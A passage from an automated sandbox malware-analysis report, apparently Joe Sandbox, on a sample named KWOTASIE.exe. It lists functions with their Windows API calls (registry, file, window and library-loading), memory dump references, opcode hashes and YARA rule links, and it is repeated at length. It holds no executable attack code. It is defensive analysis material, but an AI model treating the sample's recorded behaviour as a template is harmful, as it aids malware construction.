
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
RegCloseKey.ADVAPI32(00000000), ref: 004023B3

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 457e49028b24503373c7101f91d519fe0e0cb9d2b65fc59e945bc12d3e93dce8
Instruction ID: 69a0439a92fed2963c94793673695853850156b7000f6b5095c498e1c7bb27ff
Opcode Fuzzy Hash: 457e49028b24503373c7101f91d519fe0e0cb9d2b65fc59e945bc12d3e93dce8
Instruction Fuzzy Hash: EDF06832A041149BE711ABA49B4DABEB2A59B44354F15053FFA02F71C1D9FC4D41866D

Function 00405383 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405393

Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F

OleUninitialize.OLE32(00000404,00000000), ref: 004053DF

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: c4d291e73dbe556e25b8cdf62f2c5066ac8ca80256b4e3a4ac09864a90cce089
Instruction ID: 26d04017d7367bbfa1c35918477487f98c57589759ea251963dc576d4d611ade
Opcode Fuzzy Hash: c4d291e73dbe556e25b8cdf62f2c5066ac8ca80256b4e3a4ac09864a90cce089
Instruction Fuzzy Hash: 98F09072610A00DBE2115754AD01B167764EB80395F15447EFE84A23E196BA48128B7E

Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E61
EnableWindow.USER32(00000000,00000000), ref: 00401E6C

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 9e33769c6835595f85522694bbc6999b5b18b2ef09c7d62b849b7c27b2d9430a
Instruction ID: 9292e16701e7cd97f929a58a5ab9d779cc9b33b2a3d424137dc092703ffa0750
Opcode Fuzzy Hash: 9e33769c6835595f85522694bbc6999b5b18b2ef09c7d62b849b7c27b2d9430a
Instruction Fuzzy Hash: 52E09232E08200CFD7249BA5AA4946D77B4EB84354720407FE112F11D2DA7848418F69

Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 00401587
ShowWindow.USER32(?), ref: 0040159C

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: d3cd2513376d6ed837743d205884ae6d5d4bf336396e546168d2a5417aa6c254
Instruction ID: f017f9f214282da9378315d684086af48e7312a2d574c5b78b61c32a83121298
Opcode Fuzzy Hash: d3cd2513376d6ed837743d205884ae6d5d4bf336396e546168d2a5417aa6c254
Instruction Fuzzy Hash: 45E086367001059FCB25DBA4ED848BE77A6EB48310758057FE902F36A1CA759D51CF68

Function 00406626 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
GetProcAddress.KERNEL32(00000000,?), ref: 00406653

Part of subcall function 004065B6: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
Part of subcall function 004065B6: wsprintfW.USER32 ref: 00406608
Part of subcall function 004065B6: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
Instruction ID: 40ec7d190cb489a8bb7bfdeabdf724fb2ab18eb81f375fb852db001ef300dc43
Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
Instruction Fuzzy Hash: 06E0863250421166D211A6705E4487763AD9E95650707883FF956F2181D7399C31A66E

Function 00405D3E Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\KWOTASIE.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15

Function 00405D19 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,0040591E,?,?,00000000,00405AF4,?,?,?,?), ref: 00405D1E
SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405D32

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction ID: 51a2066edc4c2a81eeb0428f2148d4bf8de4f40e885bab3ef7b7d11008f75862
Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction Fuzzy Hash: 72D0C972505420ABC2512728AF0C89BBB95DB542717028B35FAA9A22B0CB304C569A98

Function 00403880 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,004036B3,00000006,?,00000006,00000008,0000000A), ref: 0040388B

Strings

C:\Users\user\AppData\Local\Temp\nsy202D.tmp\, xrefs: 0040389F

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\
API String ID: 2962429428-2866753206
Opcode ID: 3e7d8f837ec8d19fef405a95e7c850f01c78b23dd260e21e658a4d11ca10c239
Instruction ID: 7bab629218a8e1e0f7d71be1c46fcb2fd62ec8adf6c09ffa828ee9bd00e33add
Opcode Fuzzy Hash: 3e7d8f837ec8d19fef405a95e7c850f01c78b23dd260e21e658a4d11ca10c239
Instruction Fuzzy Hash: BBC0223040070092C0203F348E0F6043A54AB0133AB60437AB0BCB00F0CB3C026D450D

Function 004057FC Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403330,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403589,?,00000006,00000008,0000000A), ref: 00405802
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405810

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction ID: ef554e49865ddd63361da1c12a2af0f36bd739cc66983d197ffc2c9f8e40d56f
Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction Fuzzy Hash: 69C04C71225501DBDB507F219F09B177A54AFA0741F15C83AA586E10E0DA748465DB2D

Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

MoveFileW.KERNEL32(00000000,00000000), ref: 00401696

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 086139f37eecdad42f9a8148f2945bf0a7eb9630c8e35c0a5069e5dc0bb59789
Instruction ID: 3e6e6754c95f31a417227132d94fb2ae884618af556d43a54845cec5a9764f61
Opcode Fuzzy Hash: 086139f37eecdad42f9a8148f2945bf0a7eb9630c8e35c0a5069e5dc0bb59789
Instruction Fuzzy Hash: 20F02431608114A7CB20BBA54F0DE6F61648F963A8F24073FB011B22E1EABC8902956F

Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D

Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 7ae626cc8d750fa8de7ee35a0cf39963b00ce32650e35613724d1236d3882a7a
Instruction ID: b823128ae195addc5a2e7fdaef51ba51a72722c893b502689f98c942922f21f8
Opcode Fuzzy Hash: 7ae626cc8d750fa8de7ee35a0cf39963b00ce32650e35613724d1236d3882a7a
Instruction Fuzzy Hash: 91E0D872304100AFD710DBA4DE48AAB7358DF00368B20413AB111E51C1D6B44901976D

Function 004060E7 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406110

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: 2d66df08b7a29efef6dff9ba5d381340db71bdfba6c3c9a2337d9ff24a0a933a
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: 3FE0E672120109BEEF199F90DD0BD7B371DE704344F11452EFA06D4051E6B6A9309A78

Function 00405DC1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032F2,00000000,00000000,00403149,?,00000004,00000000,00000000,00000000), ref: 00405DD5

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
